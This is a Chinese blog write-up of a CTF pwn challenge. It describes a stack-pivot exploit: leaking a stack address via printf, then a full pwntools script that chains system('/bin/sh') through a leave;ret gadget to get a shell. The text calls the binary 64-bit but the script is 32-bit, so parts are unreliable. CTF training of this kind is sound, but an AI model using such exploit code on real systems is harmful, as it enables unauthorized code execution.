CTF PWN简单栈溢出

最新推荐文章于 2024-06-13 23:56:26 发布
最新推荐文章于 2024-06-13 23:56:26 发布
阅读量381 收藏 6
点赞数 10
文章标签: 数据结构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81031055/article/details/135832800
版权

checksec指令查看,NX保护,64位

用64位IDA分析

shift+f12没有发现后门函数

进入vul函数发现有栈溢出

我们会发现溢出字节较少,考虑用栈溢出解题

这里我们说一下栈溢出的使用条件:

栈迁移一般适用于:存在栈溢出且溢出字节较少

(一般会用到leave、ret指令)

leave、ret指令:

leave可拆分为:(mov  esp,ebp)  、(pop  ebp)

(mov  esp,ebp)意思是先将ebp赋给esp,此时esp与ebp位于同一个地址,可以把它们现在指向的那个地址,既可以当成栈顶又可以当成是栈底。(pop  ebp)意思是将栈顶的内容弹入ebp(此时栈顶的内容也就是ebp的内容,也就是说现在把ebp的内容赋给了esp)。因为esp要时刻指向栈顶,既然栈顶的内容都弹走了,那么esp自然要往下挪一个内存单元。

首先我们发送0x28个垃圾数据查看栈里面的情况

 由于是printf函数,它只有遇到\x00时才会截断(函数才会停止)。

因为填充的数据后面跟的就是栈,所以它会将栈地址顺带打印出来,接下来我们继续编写脚本。

经过调试,这里我们会得到一个栈地址。

此时,我们用所得到的栈地址减去输入数据的初始地址

就会得到栈地址的偏移

到这里,我们的第一次输入就算完成了,在第二次输入的时候就能去构造payload。

在这里我们发现有system函数,我们可以利用system函数的plt表。

利用read函数读入“/bin/sh” 然后getshell

脚本如下:

from pwn import*
context(os='linux',arch='i386',log_level='debug')
p=process("./pwn1")
elf=ELF("./pwn1")
def bug():
	gdb.attach(p)
	pause()
p.recvuntil("Welcome, my friend. What's your name?\n")
pay=b'a'*0x27+b'b'
#bug()
p.send(pay)




p.recvuntil("b")
stack=u32(p.recv(4))-56
print(hex(stack))

p.recvuntil("\n")
leave_addr=0x80485FD
pay=(b'aaaa'+p32(elf.plt['system'])+p32(0)+p32(stack+16)+b'/bin/sh\x00').ljust(0x28,b'\x00')+p32(stack)+p32(leave_addr)
bug()
p.send(pay)


p.interactive()

 

到这里,我们本地调试就打通了!

☜.♡.☞
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
简单栈溢出(记录pwn入门)
pdxbshx的博客
11-07 597
没有PIE:ret2libcNX关闭:ret2shellcode其他思路:ret2csu、ret2text。
CTF笔记:溢出利用
PwnGuo的博客
05-19 951
整数溢出 典型整数溢出利用 这个 v3 是一个无符号数,最大只能 255,如果超过的话就会进行 mod 255所以可以传入一个总共是 0x105 的, 这样他的得到的就是 6 是符合长度限制的,从而绕过 if 的检测dest 的大小是 0x11h,加上 ebp 的 0x4h,所以需要在前面填充 0x15h 后门程序 exp: python2 #coding=utf-8 from pwn import * p=remote('node3.buuoj.cn',29748) p.recvuntil("na
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1379
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
CTFHUB-WriteUp】pwn技能树-栈溢出-Ret2VDSO
qq_39933891的博客
03-11 783
ops
XCTF-攻防世界CTF平台-Web类——18、favorite_number(命令注入)(php5.5.9整数溢出、preg_match正则表达式绕过)
Onlyone_1314的博客
01-15 3551
目录标题方法1:ls -i方法2:定义变量输出方法3:写到文件输出方法4:``和$()命令替换 打开题目地址: 提示了源代码,以及php版本是5.5.9 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
CTF PWN 武器库题
12-12
CTF PWN 武器库题或rifle题,利用fastbin堆溢出得shell,
pwn(2)-栈溢出
qq_73667990的博客
06-08 1375
只要我们通过特定的汇编代码把特定的寄存器设定为特定的值后,在调用int 80h执行sys_execve(“/bin/sh”,NULL,NULL)就可以获得shell了;64位程序传递参数不是直接通过栈,而是前六个参数通过寄存器,分别是RDI,RSI,RDX,RCX,R8,R9。不同内核态操作通过给寄存器设置不同的值,在调用指令int 80h,就可以通知内核完成不同的功能。2.ebx设为"/bin/sh"字符串的地址。2.RDI设为"/bin/sh"字符串的地址,RDI=&(“/bin/sh”)
CTF-PWN-栈溢出-基本ROP-【ret2shellcode】
llovewuzhengzi的博客
11-16 116
C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数(类型为 int 型)。栈溢出,同时栈上可执行,利用泄露的buf地址作为返回地址,同时将shellcode写入buf。这里read存在栈溢出,同时第一个fprintf输出了buf的地址。Has RWX segments提示有可读可写可执行的段。接受字节‘0x ……’的处理,先化整型然后p64处理。shellcode一个不行就换下一个。控制程序去执行我们自己填充的代码。
CTF-PWN笔记(一)-- 栈溢出 之 基础ROP
CK_0ff的博客
01-09 4279
文章目录栈linux内存布局原理文件保护机制CanaryNXPIE(ASLR)RELRO简单栈溢出(ret2txt)ret2shellcode 栈 栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作栈顶,当然,它也有栈底。 高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存
CTF--pwn栈溢出漏洞)
q759451733的博客
05-27 4532
0x00 工具介绍 * Ubuntu系统(kali也可以) * gdb-peda 这个是神器,二进制分析必备神器 0x01 程序源码 #include <stdio.h> #include <string.h> #include <stdlib.h> int main(int argc, char * argv[]) { char buf[4...
ctf(pwn)栈溢出介绍
半岛铁盒的博客
03-05 1563
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致 与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是 程序必须向栈上写入数据。 写入的数据大小没有被良好地控制。 一般来说,我们会有如下的覆盖需求 覆盖函数返回地址,这时候就是直接看 EBP 即可。 覆盖栈上某个变量的内容,这时候就需要更加精细的.
CTF-浅尝64位栈溢出PWN
热门推荐
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2183
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
CTF必备技能丨Linux Pwn入门教程——栈溢出基础
dfdhxb995397的博客
07-09 488
这是一套Linux Pwn入门教程系列,作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的一些题目和文章整理出一份相对完整的Linux Pwn教程。 课程回顾>>Linux Pwn入门教程第一章:环境配置 更多Pwn视频课程:https://www.ichunqiu.com/courses/pwn?from=weixin 本系列教程仅针对i386/amd...
pwn基础之ctfwiki-栈溢出-基础ROP-ret2libc-3
qq_52658640的博客
04-23 1143
文章目录基础知识libc泄露原理利用方法ret2libc3挖掘漏洞利用漏洞利用脚本 基础知识 libc泄露 原理 当有一道题给了可执行文件文件,在ida分析中并不能找到system函数和binsh地址,这时我们就可以利用在栈溢出之前执行过的函数泄露libc的版本。因为libc函数相对于libc的基地址都是确定的,采用 got 表泄露,即输出某个函数对应的 got 表项的内容,所以就可以通过上述方法来获取libc函数中的system地址和字符binsh的地址。 system 函数属于 libc,而 libc
数据结构(DS)学习笔记(4):线性表
最新发布
她与剑意皆失的博客
06-13 457
线性表是最常用且最简单的一种数据结构,是一种典型的线性结构,一个线性表是n个数据元素的有限序列。除了第一个元素外,每个元素有且仅有一个直接前趋;除了最后一个元素外,每个元素有且仅有一个直接后继。同一个线性表中的元素必定具有相同特征,数据元素之间的关系是线性关系。线性表中每个数据元素所占的空间是一样大的。线性表的顺序表示:顺序存储结构或顺序映象。线性表的顺序表示:指的是用同一组地址连续的存储单元依次存储线性表的数据元素。顺序存储定义:把逻辑上相邻的数据元素存储在物理上相邻的存储单元中的存储结构。线性表逻辑结构
pwn+栈溢出解题思路
11-10
pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值